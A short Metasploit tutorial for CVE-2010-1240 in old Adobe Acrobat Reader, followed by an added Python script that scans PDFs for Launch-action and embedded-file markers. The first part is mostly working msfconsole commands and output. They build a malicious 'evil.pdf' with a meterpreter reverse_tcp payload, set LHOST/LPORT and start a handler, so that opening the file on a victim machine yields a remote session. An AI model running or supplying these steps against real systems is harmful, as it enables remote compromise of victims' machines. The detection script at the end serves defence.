Sample Exploits using Metasploit

Introduction

Metasploit includes browser exploits and other modules for performing adversarial attacks.

CVE-2010-1240 (Acrobat Reader)

The vulnerable software versions are Adobe Acrobat Reader up to 9.3.0.

1. Create the malicious PDF file

msf6 > set payload windows/meterpreter/reverse_tcp # or any chosen payload
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > show targets
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set TARGET 0
target => 0
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST <IP>
LHOST => 192.168.0.4
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LPORT <PORT>
LPORT => 9999
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit

[*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Using 'windows/x64/meterpreter/reverse_tcp' as payload...
[+] Parsing Successful. Creating 'evil.pdf' file...
[+] evil.pdf stored at /root/.msf4/local/evil.pdf

2. Create and run a listener

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit

3. Open the evil.pdf file on the vulnerable target machine to obtain a session.
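
For the defending side, a triage check for files like the one this module produces. This is an added example, not code from the original page or from Metasploit. It counts the PDF name tokens that an embedded-executable document depends on (a Launch action, an auto-trigger, an attachment) and decodes `#xx` name escapes first. All function names and both sample byte strings are constructed for illustration.

```python
import re

# Name tokens worth flagging when triaging a PDF for Launch-action /
# embedded-file abuse. The list is an assumption of this example.
SUSPICIOUS = ("/Launch", "/EmbeddedFile", "/OpenAction", "/AA", "/JavaScript", "/JS")

# A PDF name is '/' followed by any bytes that are not whitespace or delimiters.
_NAME = re.compile(rb"/[^\x00\t\n\x0c\r ()<>\[\]{}/%]+")
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")

# Constructed samples: object skeletons only, no payload and no command.
SAMPLE_FLAGGED = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Action /S /L#61unch >>\nendobj\n"
    b"3 0 obj\n<< /Type /EmbeddedFile /Length 0 >>\nstream\n\nendstream\nendobj\n"
)
SAMPLE_PLAIN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"


def normalise(name: bytes) -> str:
    """Decode #xx escapes so '/L#61unch' compares equal to '/Launch'."""
    return _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), name).decode("latin-1")


def count_names(data: bytes) -> dict:
    """Count suspicious names in raw PDF bytes.

    Names inside compressed object streams are not visible to this scan.
    """
    counts = {name: 0 for name in SUSPICIOUS}
    for token in _NAME.findall(data):
        name = normalise(token)
        if name in counts:
            counts[name] += 1
    return counts


def verdict(counts: dict) -> str:
    """'high' when a Launch action is paired with an auto-trigger or attachment."""
    if counts["/Launch"] and (counts["/OpenAction"] or counts["/AA"] or counts["/EmbeddedFile"]):
        return "high"
    return "review" if any(counts.values()) else "clean"


if __name__ == "__main__":
    for label, sample in (("flagged", SAMPLE_FLAGGED), ("plain", SAMPLE_PLAIN)):
        print(label, verdict(count_names(sample)))
```

A "clean" result only covers the uncompressed parts of the file; documents that keep their objects in compressed streams need to be inflated before scanning.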

References

  • https://vuldb.com/?id.52579
  • https://www.rapid7.com/db/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe/